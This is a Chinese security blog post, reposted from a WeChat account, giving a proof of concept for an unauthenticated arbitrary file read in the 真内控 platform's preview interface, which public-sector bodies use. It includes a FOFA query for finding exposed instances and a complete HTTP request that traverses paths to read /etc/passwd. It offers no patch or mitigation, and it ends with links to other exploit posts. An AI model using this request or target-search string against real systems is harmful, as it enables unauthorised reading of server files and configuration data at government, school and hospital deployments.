真内控国产化开发平台 preview 任意文件读取漏洞 poc

2024年6月21日14:35:41评论10 views字数 770阅读2分34秒阅读模式

0x02产品介绍

真内控国产化平台是基于国产可控技术开发的内部控制管理咨询及信息化服务平台。该平台涵盖了预算绩效、支出管理、采购管理、合同管理、资产管理、基建项目管理等多个模块，为公共部门（包括政府部门、科研机构、学校、医院等）提供全方位的经济活动内部控制解决方案。真内控公司凭借其在内控领域的专业性和对国产化技术的深度应用，已经成为行业内的领先品牌，其产品在众多中央部门和省级行政事业单位中得到广泛应用。

0x03漏洞威胁

真内控国产化平台 preview接口存在任意文件读取漏洞，未经身份验证的攻击者可以通过构造精心设计的请求，成功利用漏洞读取服务器上的任意文件，包括敏感系统文件和应用程序配置文件等。导致系统处于极不安全的状态。

0x04漏洞环境

FOFA:

body="js/npm.echarts.js"

真内控国产化开发平台 preview 任意文件读取漏洞 poc

0x05漏洞复现

POC

GET /print/billPdf/preview?urlPath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: close

真内控国产化开发平台 preview 任意文件读取漏洞 poc

原文始发于微信公众号（冷漠安全）：「漏洞复现」真内控国产化开发平台 preview 任意文件读取漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

真内控国产化开发平台 preview 任意文件读取漏洞 poc

VMware vCenter Server 关键 RCE 漏洞 (CVE-2024-37079, CVE-2024-37080)

碧海威科技-L7云路由jumper.php存在命令执行漏洞

锐捷上网行为管理系统 static_convert 命令执行漏洞【附poc】

锐捷上网行为管理系统naborTable RCE[附POC]

xwiki-CVE-2024-31982漏洞深入复现

锐捷统一上网行为管理与审计系统naborTable命令执行POC

漏洞预警 | XWiki远程代码执行漏洞

时空智友ERP系统 updater.uploadStudioFile 任意文件上传漏洞

Probllama：Ollama AI 远程代码执行漏洞 (CVE-2024-37032) - 概述和缓解措施

逻辑缺陷导致的敏感信息泄露

发表评论

在线咨询

微信